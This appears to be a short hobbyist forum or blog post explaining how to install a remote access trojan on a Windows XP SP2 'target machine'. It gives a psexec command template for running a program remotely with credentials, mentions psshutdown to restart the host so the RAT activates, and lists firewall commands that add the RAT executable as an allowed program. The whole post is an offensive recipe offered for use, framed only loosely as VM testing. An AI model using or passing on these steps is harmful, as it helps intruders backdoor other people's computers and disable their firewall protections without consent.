Tested several commands in my vm environment, wrote a little script to install a RAT remotely.
Well if your target machine is running windows xp sp2 with firewall enabled, you can use this command combined with psexec. Just expand your imaginations.
Some basic command in using psexec are:
psexec \\computer_ip -u username -p password "program_path" command
To shutdown a machine remotely, you can use psshutdown.
Why do we need to shutdown a remote host? well sometime if we installed a RAT, it needs to be restarted first before we can put it in action.
show config >> conf.txt
add allowed program = C:\WINDOWS\RAT\rat.exe name = rat32 mode = ENABLE